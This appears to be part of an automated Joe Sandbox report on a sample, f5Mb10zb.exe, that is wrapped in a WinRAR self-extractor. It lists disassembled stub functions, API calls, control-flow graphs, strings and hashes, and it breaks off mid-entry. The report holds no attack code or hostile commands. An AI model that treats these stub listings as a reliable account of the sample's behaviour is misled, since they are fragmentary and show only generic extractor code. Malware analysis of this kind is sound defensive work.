                                                                                    • _swprintf.LIBCMT ref: 0073BAC2
                                                                                    • GetLastError.KERNEL32(?,00000011), ref: 0073BAF4
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0073BB43
                                                                                    • _swprintf.LIBCMT ref: 0073BB7C
                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0073BBD0
                                                                                    • GetCommandLineW.KERNEL32 ref: 0073BBEA
                                                                                    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0073BC47
                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 0073BC6F
                                                                                    • Sleep.KERNEL32(00000064), ref: 0073BCB9
                                                                                    • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0073BCE2
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0073BCEB
                                                                                    • _swprintf.LIBCMT ref: 0073BD1E
                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0073BD7D
                                                                                    • SetDlgItemTextW.USER32(?,00000065,007535F4), ref: 0073BD94
                                                                                    • GetDlgItem.USER32(?,00000065), ref: 0073BD9D
                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0073BDAC
                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0073BDBB
                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0073BE68
                                                                                    • _wcslen.LIBCMT ref: 0073BEBE
                                                                                    • _swprintf.LIBCMT ref: 0073BEE8
                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0073BF32
                                                                                    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,00050E74), ref: 0073BF4C
                                                                                    • GetDlgItem.USER32(?,00000068), ref: 0073BF55
                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0073BF6B
                                                                                    • GetDlgItem.USER32(?,00000066), ref: 0073BF85
                                                                                    • SetWindowTextW.USER32(00000000,0076A472), ref: 0073BFA7
                                                                                    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0073C007
                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0073C01A
                                                                                    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0073C0BD
                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 0073C197
                                                                                    • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0073C1D9
                                                                                      • Part of subcall function 0073C73F: __EH_prolog.LIBCMT ref: 0073C744
                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0073C1FD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
                                                                                    • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\AppData\Local\Temp\RarSFX0$C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe$LICENSEDLG$PDu<s$STARTDLG$^s$__tmp_rar_sfx_access_check_%u$hs$winrarsfxmappingfile.tmp$Qu
                                                                                    • API String ID: 3829768659-265958362
                                                                                    • Opcode ID: 50e4ab125df4b1a5d3c8b089f49e8b5ff65317a735412f1585aaaf729c8a25ba
                                                                                    • Instruction ID: 0d9ac4ed9b2ee2f1ffaacead047d36450ce664eda37f6f93e760c6712464fb7c
                                                                                    • Opcode Fuzzy Hash: 50e4ab125df4b1a5d3c8b089f49e8b5ff65317a735412f1585aaaf729c8a25ba
                                                                                    • Instruction Fuzzy Hash: E242E4B1940358FAFB229B749C4EFBE3B6CAB01B40F108155F645B60D3DBBC5A448B66
                                                                                    Function 00730863 Relevance: 98.3, APIs: 23, Strings: 33, Instructions: 316libraryfileloaderCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 269 730863-730886 call 73ec50 GetModuleHandleW 272 7308e7-730b48 269->272 273 730888-73089f GetProcAddress 269->273 274 730c14-730c40 GetModuleFileNameW call 72c29a call 730602 272->274 275 730b4e-730b59 call 7475fb 272->275 276 7308a1-7308b7 273->276 277 7308b9-7308c9 GetProcAddress 273->277 291 730c42-730c4e call 72b146 274->291 275->274 286 730b5f-730b8d GetModuleFileNameW CreateFileW 275->286 276->277 279 7308e5 277->279 280 7308cb-7308e0 277->280 279->272 280->279 289 730c08-730c0f CloseHandle 286->289 290 730b8f-730b9b SetFilePointer 286->290 289->274 290->289 292 730b9d-730bb9 ReadFile 290->292 298 730c50-730c5b call 73081b 291->298 299 730c7d-730ca4 call 72c310 GetFileAttributesW 291->299 292->289 295 730bbb-730be0 292->295 297 730bfd-730c06 call 730371 295->297 297->289 306 730be2-730bfc call 73081b 297->306 298->299 308 730c5d-730c7b CompareStringW 298->308 309 730ca6-730caa 299->309 310 730cae 299->310 306->297 308->299 308->309 309->291 313 730cac 309->313 311 730cb0-730cb5 310->311 314 730cb7 311->314 315 730cec-730cee 311->315 313->311 316 730cb9-730ce0 call 72c310 GetFileAttributesW 314->316 317 730cf4-730d0b call 72c2e4 call 72b146 315->317 318 730dfb-730e05 315->318 323 730ce2-730ce6 316->323 324 730cea 316->324 328 730d73-730da6 call 724092 AllocConsole 317->328 329 730d0d-730d6e call 73081b * 2 call 72e617 call 724092 call 72e617 call 73a7e4 317->329 323->316 326 730ce8 323->326 324->315 326->315 335 730df3-730df5 ExitProcess 328->335 336 730da8-730ded GetCurrentProcessId AttachConsole call 743e13 GetStdHandle WriteConsoleW Sleep FreeConsole 328->336 329->335 336->335
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32), ref: 0073087C
                                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0073088E
                                                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 007308BF
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00730B69
                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00730B83
                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00730B93
                                                                                    • ReadFile.KERNEL32(00000000,?,00007FFE,|<u,00000000), ref: 00730BB1
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00730C09
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00730C1E
                                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<u,?,00000000,?,00000800), ref: 00730C72
                                                                                    • GetFileAttributesW.KERNELBASE(?,?,|<u,00000800,?,00000000,?,00000800), ref: 00730C9C
                                                                                    • GetFileAttributesW.KERNEL32(?,?,D=u,00000800), ref: 00730CD8
                                                                                      • Part of subcall function 0073081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00730836
                                                                                      • Part of subcall function 0073081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0072F2D8,Crypt32.dll,00000000,0072F35C,?,?,0072F33E,?,?,?), ref: 00730858
                                                                                    • _swprintf.LIBCMT ref: 00730D4A
                                                                                    • _swprintf.LIBCMT ref: 00730D96
                                                                                      • Part of subcall function 00724092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007240A5
                                                                                    • AllocConsole.KERNEL32 ref: 00730D9E
                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00730DA8
                                                                                    • AttachConsole.KERNEL32(00000000), ref: 00730DAF
                                                                                    • _wcslen.LIBCMT ref: 00730DC4
                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00730DD5
                                                                                    • WriteConsoleW.KERNEL32(00000000), ref: 00730DDC
                                                                                    • Sleep.KERNEL32(00002710), ref: 00730DE7
                                                                                    • FreeConsole.KERNEL32 ref: 00730DED
                                                                                    • ExitProcess.KERNEL32 ref: 00730DF5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                    • String ID: (=u$,<u$,@u$0?u$0Au$4Bu$8>u$D=u$DXGIDebug.dll$H?u$H@u$HAu$P>u$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=u$`@u$d?u$dAu$dwmapi.dll$h=u$h>u$kernel32$uxtheme.dll$|<u$|?u$|@u$<u$>u$?u$@u$Au
                                                                                    • API String ID: 1207345701-1434987480
                                                                                    • Opcode ID: 62b9cfc8fd23f7d095fdd5e9f35b9c716cbce943582b07c91335e25dc5599654
                                                                                    • Instruction ID: 9f8f0f58f41ba286ac0de05155314819ad34727560f3c18d7c68244d78ac29bf
                                                                                    • Opcode Fuzzy Hash: 62b9cfc8fd23f7d095fdd5e9f35b9c716cbce943582b07c91335e25dc5599654
                                                                                    • Instruction Fuzzy Hash: 56D1A6B1008384ABD3219F50C859BDFB7F8BB84746F50492DF989961A1D7FC864CCBA6
                                                                                    Function 0073C73F Relevance: 51.2, APIs: 23, Strings: 6, Instructions: 428windowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 348 73c73f-73c757 call 73eb78 call 73ec50 353 73d40d-73d418 348->353 354 73c75d-73c787 call 73b314 348->354 354->353 357 73c78d-73c792 354->357 358 73c793-73c7a1 357->358 359 73c7a2-73c7b7 call 73af98 358->359 362 73c7b9 359->362 363 73c7bb-73c7d0 call 731fbb 362->363 366 73c7d2-73c7d6 363->366 367 73c7dd-73c7e0 363->367 366->363 368 73c7d8 366->368 369 73c7e6 367->369 370 73d3d9-73d404 call 73b314 367->370 368->370 371 73ca5f-73ca61 369->371 372 73c9be-73c9c0 369->372 373 73c7ed-73c7f0 369->373 374 73ca7c-73ca7e 369->374 370->358 385 73d40a-73d40c 370->385 371->370 376 73ca67-73ca77 SetWindowTextW 371->376 372->370 378 73c9c6-73c9d2 372->378 373->370 379 73c7f6-73c850 call 73a64d call 72bdf3 call 72a544 call 72a67e call 726edb 373->379 374->370 377 73ca84-73ca8b 374->377 376->370 377->370 381 73ca91-73caaa 377->381 382 73c9e6-73c9eb 378->382 383 73c9d4-73c9e5 call 747686 378->383 436 73c98f-73c9a4 call 72a5d1 379->436 386 73cab2-73cac0 call 743e13 381->386 387 73caac 381->387 390 73c9f5-73ca00 call 73b48e 382->390 391 73c9ed-73c9f3 382->391 383->382 385->353 386->370 405 73cac6-73cacf 386->405 387->386 392 73ca05-73ca07 390->392 391->392 398 73ca12-73ca32 call 743e13 call 743e3e 392->398 399 73ca09-73ca10 call 743e13 392->399 425 73ca34-73ca3b 398->425 426 73ca4b-73ca4d 398->426 399->398 409 73cad1-73cad5 405->409 410 73caf8-73cafb 405->410 411 73cb01-73cb04 409->411 412 73cad7-73cadf 409->412 410->411 414 73cbe0-73cbee call 730602 410->414 419 73cb11-73cb2c 411->419 420 73cb06-73cb0b 411->420 412->370 417 73cae5-73caf3 call 730602 412->417 427 73cbf0-73cc04 call 74279b 414->427 417->427 437 73cb76-73cb7d 419->437 438 73cb2e-73cb68 419->438 420->414 420->419 432 73ca42-73ca4a call 747686 425->432 433 73ca3d-73ca3f 425->433 426->370 428 73ca53-73ca5a call 743e2e 426->428 447 73cc11-73cc62 call 730602 call 73b1be GetDlgItem SetWindowTextW SendMessageW call 743e49 427->447 448 73cc06-73cc0a 427->448 428->370 432->426 433->432 454 73c855-73c869 SetFileAttributesW 436->454 455 73c9aa-73c9b9 call 72a55a 436->455 441 73cbab-73cbce call 743e13 * 2 437->441 442 73cb7f-73cb97 call 743e13 437->442 471 73cb6a 438->471 472 73cb6c-73cb6e 438->472 441->427 476 73cbd0-73cbde call 7305da 441->476 442->441 458 73cb99-73cba6 call 7305da 442->458 482 73cc67-73cc6b 447->482 448->447 453 73cc0c-73cc0e 448->453 453->447 459 73c90f-73c91f GetFileAttributesW 454->459 460 73c86f-73c8a2 call 72b991 call 72b690 call 743e13 454->460 455->370 458->441 459->436 469 73c921-73c930 DeleteFileW 459->469 492 73c8b5-73c8c3 call 72bdb4 460->492 493 73c8a4-73c8b3 call 743e13 460->493 469->436 475 73c932-73c935 469->475 471->472 472->437 479 73c939-73c965 call 724092 GetFileAttributesW 475->479 476->427 488 73c937-73c938 479->488 489 73c967-73c97d MoveFileW 479->489 482->370 487 73cc71-73cc85 SendMessageW 482->487 487->370 488->479 489->436 491 73c97f-73c989 MoveFileExW 489->491 491->436 492->455 498 73c8c9-73c908 call 743e13 call 73fff0 492->498 493->492 493->498 498->459
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 0073C744
                                                                                      • Part of subcall function 0073B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0073B3FB
                                                                                      • Part of subcall function 0073AF98: _wcschr.LIBVCRUNTIME ref: 0073B033
                                                                                    • _wcslen.LIBCMT ref: 0073CA0A
                                                                                    • _wcslen.LIBCMT ref: 0073CA13
                                                                                    • SetWindowTextW.USER32(?,?), ref: 0073CA71
                                                                                    • _wcslen.LIBCMT ref: 0073CAB3
                                                                                    • _wcsrchr.LIBVCRUNTIME ref: 0073CBFB
                                                                                    • GetDlgItem.USER32(?,00000066), ref: 0073CC36
                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0073CC46
                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,0076A472), ref: 0073CC54
                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0073CC7F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                                                                    • String ID: %s.%d.tmp$<br>$<s$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$s
                                                                                    • API String ID: 986293930-1073329622
                                                                                    • Opcode ID: 15423c9eda76cb862de3b56580f74ef1fb0409c84fbfe36a9d4ff2aa8653699e
                                                                                    • Instruction ID: e40e13d8eb6ae6d22bb53e2ebe97b4a4424021efc913dc6c98eca459f6b86cd9
                                                                                    • Opcode Fuzzy Hash: 15423c9eda76cb862de3b56580f74ef1fb0409c84fbfe36a9d4ff2aa8653699e
                                                                                    • Instruction Fuzzy Hash: 15E167B2900218EAEF25DB64DD49EEE73BCAB04350F1080A5F649E7051EB7C9F848F61
                                                                                    Function 0072DA67 Relevance: 26.9, APIs: 5, Strings: 10, Instructions: 663COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 0072DA70
                                                                                    • _wcschr.LIBVCRUNTIME ref: 0072DA91
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0072DAAC
                                                                                      • Part of subcall function 0072C29A: _wcslen.LIBCMT ref: 0072C2A2
                                                                                      • Part of subcall function 007305DA: _wcslen.LIBCMT ref: 007305E0
                                                                                      • Part of subcall function 00731B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0072BAE9,00000000,?,?,?,00010486), ref: 00731BA0
                                                                                    • _wcslen.LIBCMT ref: 0072DDE9
                                                                                    • __fprintf_l.LIBCMT ref: 0072DF1C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                                                    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9u
                                                                                    • API String ID: 557298264-2633427365
                                                                                    • Opcode ID: ff9419c86500eb6af1173b37a9b706e3d8a57c3c729fe51a29683503e04ea166
                                                                                    • Instruction ID: 18da48c45fd7e43d52ab7b3aec034183b8ff0db95df85e477d57db244e8214ef
                                                                                    • Opcode Fuzzy Hash: ff9419c86500eb6af1173b37a9b706e3d8a57c3c729fe51a29683503e04ea166
                                                                                    • Instruction Fuzzy Hash: 6632E171900228DBDF34EF68E845BEE77A5FF04300F50416AF90697291E7B99D85CB90
                                                                                    Function 0073A6C2 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 100memorywindowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 802 73a6c2-73a6df FindResourceW 803 73a6e5-73a6f6 SizeofResource 802->803 804 73a7db 802->804 803->804 806 73a6fc-73a70b LoadResource 803->806 805 73a7dd-73a7e1 804->805 806->804 807 73a711-73a71c LockResource 806->807 807->804 808 73a722-73a737 GlobalAlloc 807->808 809 73a7d3-73a7d9 808->809 810 73a73d-73a746 GlobalLock 808->810 809->805 811 73a7cc-73a7cd GlobalFree 810->811 812 73a74c-73a76a call 740320 810->812 811->809 816 73a7c5-73a7c6 GlobalUnlock 812->816 817 73a76c-73a78e call 73a626 812->817 816->811 817->816 822 73a790-73a798 817->822 823 73a7b3-73a7c1 822->823 824 73a79a-73a7ae GdipCreateHBITMAPFromBitmap 822->824 823->816 824->823 825 73a7b0 824->825 825->823
                                                                                    APIs
                                                                                    • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0073B73D,00000066), ref: 0073A6D5
                                                                                    • SizeofResource.KERNEL32(00000000,?,?,?,0073B73D,00000066), ref: 0073A6EC
                                                                                    • LoadResource.KERNEL32(00000000,?,?,?,0073B73D,00000066), ref: 0073A703
                                                                                    • LockResource.KERNEL32(00000000,?,?,?,0073B73D,00000066), ref: 0073A712
                                                                                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0073B73D,00000066), ref: 0073A72D
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0073A73E
                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0073A762
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0073A7C6
                                                                                      • Part of subcall function 0073A626: GdipAlloc.GDIPLUS(00000010), ref: 0073A62C
                                                                                    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0073A7A7
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0073A7CD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                    • String ID: Fjuns$PNG
                                                                                    • API String ID: 211097158-78378848
                                                                                    • Opcode ID: d8ae1a963484e62f0f4a2fba6429fa46cdab8108938f25bfd17f7b7788658cad
                                                                                    • Instruction ID: b9790c83e655af9c2992eb7ccce5535d8c2a56567fc3b7ae2ac967aab13bede4
                                                                                    • Opcode Fuzzy Hash: d8ae1a963484e62f0f4a2fba6429fa46cdab8108938f25bfd17f7b7788658cad
                                                                                    • Instruction Fuzzy Hash: AC31C172600B06BFE7119F31DC8DD5BBBB8EF847A1F044518F84682221EB79D8409AA5
                                                                                    Function 0073D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 0073B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0073B579
                                                                                      • Part of subcall function 0073B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0073B58A
                                                                                      • Part of subcall function 0073B568: IsDialogMessageW.USER32(00010486,?), ref: 0073B59E
                                                                                      • Part of subcall function 0073B568: TranslateMessage.USER32(?), ref: 0073B5AC
                                                                                      • Part of subcall function 0073B568: DispatchMessageW.USER32(?), ref: 0073B5B6
                                                                                    • GetDlgItem.USER32(00000068,0077FCB8), ref: 0073D4E8
                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,0073AF07,00000001,?,?,0073B7B9,0075506C,0077FCB8,0077FCB8,00001000,00000000,00000000), ref: 0073D510
                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0073D51B
                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,007535F4), ref: 0073D529
                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0073D53F
                                                                                    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0073D559
                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0073D59D
                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0073D5AB
                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0073D5BA
                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0073D5E1
                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,007543F4), ref: 0073D5F0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                    • String ID: \
                                                                                    • API String ID: 3569833718-2967466578
                                                                                    • Opcode ID: 01802bda7270e45dcc833d630d823a4a95868bc8fe1fe530722f326c053f7754
                                                                                    • Instruction ID: b9fbe9379c3485a830858ffac9974e65971657f74c6c3bca83318dbd1a8ff926
                                                                                    • Opcode Fuzzy Hash: 01802bda7270e45dcc833d630d823a4a95868bc8fe1fe530722f326c053f7754
                                                                                    • Instruction Fuzzy Hash: 8031F571185741BFE301DF24DC4AFAB7FADEB86B04F104508F551961D1DB688A08877B
                                                                                    Function 0073D78F Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 184COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
